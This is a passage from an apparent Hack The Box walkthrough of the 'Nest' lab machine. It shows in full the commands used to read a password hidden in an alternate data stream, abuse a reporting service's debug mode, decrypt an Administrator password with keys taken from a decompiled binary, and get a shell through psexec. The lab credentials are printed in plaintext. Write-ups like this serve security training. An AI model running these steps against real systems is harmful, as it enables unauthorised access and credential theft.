u505@naos:~/HTB/Machines/Nest/mnt$ file './users/C.Smith/HQK Reporting/AD Integration Module/HqkLdap.exe' ./users/C.Smith/HQK Reporting/AD Integration Module/HqkLdap.exe: PE32 executable (console) Intel 80386 Mono/.Net assembly, for MS Windows
HQK Reportinga has something to do with the service found on port 4386.
u505@naos:~/HTB/Machines/Nest/mnt$ cat './users/C.Smith/HQK Reporting/HQK_Config_Backup.xml' <?xml version="1.0"?> <ServiceSettings xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema"> <Port>4386</Port> <QueryDirectory>C:\Program Files\HQK\ALL QUERIES</QueryDirectory> </ServiceSettings>
The last file Debug Mode Password is empty.
u505@naos:~/HTB/Machines/Nest/mnt$ ls -l './users/C.Smith/HQK Reporting/Debug Mode Password.txt'
-rwxr-xr-x 1 root root 0 Aug 8 2019 './users/C.Smith/HQK Reporting/Debug Mode Password.txt'
But checking it with smbclient, a Alternate data stream appears.
u505@naos:~/HTB/Machines/Nest$ smbclient \\\\10.10.10.178\\Users -U c.Smith Enter WORKGROUP\c.Smith's password: Try "help" to get a list of possible commands. smb: \> dir . D 0 Sat Jan 25 18:04:21 2020 .. D 0 Sat Jan 25 18:04:21 2020 Administrator D 0 Fri Aug 9 11:08:23 2019 C.Smith D 0 Sun Jan 26 02:21:44 2020 L.Frost D 0 Thu Aug 8 13:03:01 2019 R.Thompson D 0 Thu Aug 8 13:02:50 2019 TempUser D 0 Wed Aug 7 18:55:56 2019
10485247 blocks of size 4096. 6545619 blocks available smb: \> cd C.Smith smb: \C.Smith\> cd "HQK Reporting" smb: \C.Smith\HQK Reporting\> dir . D 0 Thu Aug 8 19:06:17 2019 .. D 0 Thu Aug 8 19:06:17 2019 AD Integration Module D 0 Fri Aug 9 08:18:42 2019 Debug Mode Password.txt A 0 Thu Aug 8 19:08:17 2019 HQK_Config_Backup.xml A 249 Thu Aug 8 19:09:05 2019
10485247 blocks of size 4096. 6545619 blocks available smb: \C.Smith\HQK Reporting\> allinfo "Debug Mode Password.txt" altname: DEBUGM~1.TXT create_time: Thu Aug 8 07:06:12 PM 2019 EDT access_time: Thu Aug 8 07:06:12 PM 2019 EDT write_time: Thu Aug 8 07:08:17 PM 2019 EDT change_time: Thu Aug 8 07:08:17 PM 2019 EDT attributes: A (20) stream: [::$DATA], 0 bytes stream: [:Password:$DATA], 15 bytes smb: \C.Smith\HQK Reporting\> get "Debug Mode Password.txt:Password" getting file \C.Smith\HQK Reporting\Debug Mode Password.txt:Password of size 15 as Debug Mode Password.txt:Password (0.1 KiloBytes/sec) (average 0.1 KiloBytes/sec) smb: \C.Smith\HQK Reporting\> quit
The Debug password was hidden in the ADS.
u505@naos:~/HTB/Machines/Nest$ cat "Debug Mode Password.txt:Password"
WBQ201953D8w
Root flag
Disassemble HqkLdap.exe
With DNSPY, we can decompile the Intermediate Language (IL), I used a Windows box to run DNSPY.
There is a function DS, that seems to decrypt a string with some parameters calling the function RD.
The function RD is identical to the function previously find. But this time the parameters have change.
* PassPhrase 667912 * Salt 1313Rf99 * 3 password iterations * Init vector 1L1SA61493DRV53Z * The key length is still 256 bits.
Service on port 4386
After playing with the service, we can discover that command LIST do an ls on the current directory, the command SETDIR change the local directory, in debug mode, the command SHOWQUERY shows the content of the file.
u505@naos:~/HTB/Machines/Nest$ telnet nest 4386 Trying 10.10.10.178... Connected to nest. Escape character is '^]'.
HQK Reporting Service V1.2
>help
This service allows users to run queries against databases using the legacy HQK format
--- AVAILABLE COMMANDS ---
LIST SETDIR <Directory_Name> RUNQUERY <Query_ID> DEBUG <Password> HELP <Command> >list
Use the query ID numbers below with the RUNQUERY command and the directory names with the SETDIR command
QUERY FILES IN CURRENT DIRECTORY
[DIR] COMPARISONS [1] Invoices (Ordered By Customer) [2] Products Sold (Ordered By Customer) [3] Products Sold In Last 30 Days
Current Directory: ALL QUERIES >setdir ..
Current directory set to HQK >list
Use the query ID numbers below with the RUNQUERY command and the directory names with the SETDIR command
QUERY FILES IN CURRENT DIRECTORY
[DIR] ALL QUERIES [DIR] LDAP [DIR] Logs [1] HqkSvc.exe [2] HqkSvc.InstallState [3] HQK_Config.xml
Current Directory: HQK >debug WBQ201953D8w
Debug mode enabled. Use the HELP command to view additional commands that are now available >help
This service allows users to run queries against databases using the legacy HQK format
--- AVAILABLE COMMANDS ---
LIST SETDIR <Directory_Name> RUNQUERY <Query_ID> DEBUG <Password> HELP <Command> SERVICE SESSION SHOWQUERY <Query_ID>
>setdir ldap
Current directory set to ldap >list
Use the query ID numbers below with the RUNQUERY command and the directory names with the SETDIR command
QUERY FILES IN CURRENT DIRECTORY
[1] HqkLdap.exe [2] Ldap.conf
Current Directory: ldap >showquery 2
Domain=nest.local Port=389 BaseOu=OU=WBQ Users,OU=Production,DC=nest,DC=local User=Administrator Password=yyEq0Uvvhq2uQOcWG8peLoeRQehqip/fKdeG/kjEVb4=
>quit
Was it something I said? Connection closed by foreign host.
In the LDAP directory, we find the same executable that we disassembled before, and the Ldap configuration with the encrypted password.
Decrypt administrator password
With the help of our previous program, we can decrypt the encrypted string, updating the encryption parameters and the encrypted password.
u505@naos:~/HTB/Machines/Nest/VBu505$ cat Program.vb Imports System Imports System.Text Imports System.Security.Cryptography Public Class Utils
Public Shared Function DecryptString(EncryptedString As String) As String If String.IsNullOrEmpty(EncryptedString) Then Return String.Empty Else 'Return Decrypt(EncryptedString, "N3st22", "88552299", 2, "464R5DFA5DL6LE28", 256) Return Decrypt(EncryptedString, "667912", "1313Rf99", 3, "1L1SA61493DRV53Z", 256) End If End Function
Public Shared Function Decrypt(ByVal cipherText As String, _ ByVal passPhrase As String, _ ByVal saltValue As String, _ ByVal passwordIterations As Integer, _ ByVal initVector As String, _ ByVal keySize As Integer) _ As String
Dim initVectorBytes As Byte() initVectorBytes = Encoding.ASCII.GetBytes(initVector)
Dim saltValueBytes As Byte() saltValueBytes = Encoding.ASCII.GetBytes(saltValue)
Dim cipherTextBytes As Byte() cipherTextBytes = Convert.FromBase64String(cipherText)
Dim password As New Rfc2898DeriveBytes(passPhrase, _ saltValueBytes, _ passwordIterations)
Dim keyBytes As Byte() keyBytes = password.GetBytes(CInt(keySize / 8))
Dim symmetricKey As New AesCryptoServiceProvider symmetricKey.Mode = CipherMode.CBC
Dim decryptor As ICryptoTransform decryptor = symmetricKey.CreateDecryptor(keyBytes, initVectorBytes)
Dim memoryStream As IO.MemoryStream memoryStream = New IO.MemoryStream(cipherTextBytes)
Dim cryptoStream As CryptoStream cryptoStream = New CryptoStream(memoryStream, _ decryptor, _ CryptoStreamMode.Read)
Dim plainTextBytes As Byte() ReDim plainTextBytes(cipherTextBytes.Length)
Dim decryptedByteCount As Integer decryptedByteCount = cryptoStream.Read(plainTextBytes, _ 0, _ plainTextBytes.Length)
memoryStream.Close() cryptoStream.Close()
Dim plainText As String plainText = Encoding.ASCII.GetString(plainTextBytes, _ 0, _ decryptedByteCount)
Return plainText End Function
End Class
Module Program Sub Main(args As String()) 'Console.WriteLine(Utils.DecryptString("fTEzAfYDoz1YzkqhQkH6GQFYKp1XY5hm7bjOP86yYxE=")) Console.WriteLine(Utils.DecryptString("yyEq0Uvvhq2uQOcWG8peLoeRQehqip/fKdeG/kjEVb4=")) End Sub End Module
Running the program provides us with the clear password.
u505@naos:~/HTB/Machines/Nest/VBu505$ dotnet run XtH4nkS4Pl4y1nGX
Root flag
With crackmapexec, we can confim that the password is the Administrator password.
u505@naos:~/HTB/Machines/Nest/VBu505$ sudo crackmapexec smb 10.10.10.178/32 -u administrator -p XtH4nkS4Pl4y1nGX --shares
SMB 10.10.10.178 445 HTB-NEST [*] Windows 6.1 Build 7601 (name:HTB-NEST) (domain:HTB-NEST) (signing:False) (SMBv1:False)
SMB 10.10.10.178 445 HTB-NEST [+] HTB-NEST\administrator:XtH4nkS4Pl4y1nGX (Pwn3d!)
SMB 10.10.10.178 445 HTB-NEST [+] Enumerated shares
SMB 10.10.10.178 445 HTB-NEST Share Permissions Remark
SMB 10.10.10.178 445 HTB-NEST ----- ----------- ------
SMB 10.10.10.178 445 HTB-NEST ADMIN$ READ,WRITE Remote Admin
SMB 10.10.10.178 445 HTB-NEST C$ READ,WRITE Default share
SMB 10.10.10.178 445 HTB-NEST Data READ,WRITE
SMB 10.10.10.178 445 HTB-NEST IPC$ Remote IPC
SMB 10.10.10.178 445 HTB-NEST Secure$ READ,WRITE
SMB 10.10.10.178 445 HTB-NEST Users READ,WRITE
With psexec.py, we can obtain a shell in the machine.
u505@naos:~/HTB/Machines/Nest$ python3 /opt/utils/impacket/examples/psexec.py administrator@nest Impacket v0.9.22 - Copyright 2020 SecureAuth Corporation
Password: [*] Requesting shares on nest..... [*] Found writable share ADMIN$ [*] Uploading file BKaLscZa.exe [*] Opening SVCManager on nest..... [*] Creating service XuLc on nest..... [*] Starting service XuLc..... [!] Press help for extra shell commands Microsoft Windows [Version 6.1.7601] Copyright (c) 2009 Microsoft Corporation. All rights reserved.
C:\Windows\system32>cd c:\Users\administrator\Desktop c:\Users\Administrator\Desktop>dir Volume in drive C has no label. Volume Serial Number is 2C6F-6A14
Directory of c:\Users\Administrator\Desktop
01/26/2020 07:20 AM <DIR> . 01/26/2020 07:20 AM <DIR> .. 08/05/2019 10:27 PM 32 root.txt 1 File(s) 32 bytes 2 Dir(s) 26,811,756,544 bytes free
c:\Users\Administrator\Desktop>type root.txt <ROOT_FLAG> C:\Windows\system32>systeminfo Host Name: HTB-NEST OS Name: Microsoft Windows Server 2008 R2 Standard OS Version: 6.1.7601 Service Pack 1 Build 7601 OS Manufacturer: Microsoft Corporation OS Configuration: Standalone Server OS Build Type: Multiprocessor Free Registered Owner: Windows User Registered Organization: Product ID: 00477-179-0000007-84361 Original Install Date: 8/5/2019, 9:22:30 PM System Boot Time: 12/27/2020, 5:15:00 AM System Manufacturer: VMware, Inc. System Model: VMware Virtual Platform System Type: x64-based PC Processor(s): 1 Processor(s) Installed. [01]: AMD64 Family 23 Model 1 Stepping 2 AuthenticAMD ~2000 Mhz BIOS Version: Phoenix Technologies LTD 6.00, 12/12/2018 Windows Directory: C:\Windows System Directory: C:\Windows\system32 Boot Device: \Device\HarddiskVolume1 System Locale: en-us;English (United States) Input Locale: en-us;English (United States) Time Zone: (UTC) Dublin, Edinburgh, Lisbon, London Total Physical Memory: 2,047 MB Available Physical Memory: 1,654 MB Virtual Memory: Max Size: 4,095 MB Virtual Memory: Available: 3,679 MB Virtual Memory: In Use: 416 MB Page File Location(s): C:\pagefile.sys Domain: WORKGROUP Logon Server: N/A Hotfix(s): 68 Hotfix(s) Installed. [01]: KB981391 [02]: KB981392 [03]: KB977236 [04]: KB981111 [05]: KB977238 [06]: KB977239 [07]: KB981390 [08]: KB2305420 [09]: KB2393802 [10]: KB2425227 [11]: KB2484033 [12]: KB2488113 [13]: KB2505438 [14]: KB2506014 [15]: KB2506212 [16]: KB2506928 [17]: KB2509553 [18]: KB2511250 [19]: KB2511455 [20]: KB2522422 [21]: KB2544893 [22]: KB2545698 [23]: KB2547666 [24]: KB2552343 [25]: KB2560656 [26]: KB2563227 [27]: KB2564958 [28]: KB2570947 [29]: KB2585542 [30]: KB2598845 [31]: KB2603229 [32]: KB2607047 [33]: KB2608658 [34]: KB2618451 [35]: KB2620704 [36]: KB2621440 [37]: KB2631813 [38]: KB2640148 [39]: KB2643719 [40]: KB2653956 [41]: KB2654428 [42]: KB2660075 [43]: KB2667402 [44]: KB2676562 [45]: KB2685811 [46]: KB2685813 [47]: KB2685939 [48]: KB2690533 [49]: KB2698365 [50]: KB2705219 [51]: KB2709630 [52]: KB2712808 [53]: KB2718704 [54]: KB2726535 [55]: KB2729094 [56]: KB2741355 [57]: KB2758857 [58]: KB2761217 [59]: KB2765809 [60]: KB2770660 [61]: KB2791765 [62]: KB2807986 [63]: KB2813347 [64]: KB2840149 [65]: KB4012212 [66]: KB958488 [67]: KB976902 [68]: KB976932 Network Card(s): 1 NIC(s) Installed. [01]: Intel(R) PRO/1000 MT Network Connection Connection Name: Local Area Connection DHCP Enabled: No IP address(es) [01]: 10.10.10.178 [02]: fe80::9da7:5b52:920d:5876 [03]: dead:beef::9da7:5b52:920d:5876 c:\Users\Administrator\Desktop>exit [*] Process cmd.exe finished with ErrorCode: 0, ReturnCode: 0 [*] Opening SVCManager on nest..... [*] Stopping service XuLc..... [*] Removing service XuLc..... [*] Removing file BKaLscZa.exe.....
References
Daniel Simao 08:43, 27 December 2020 (EST)
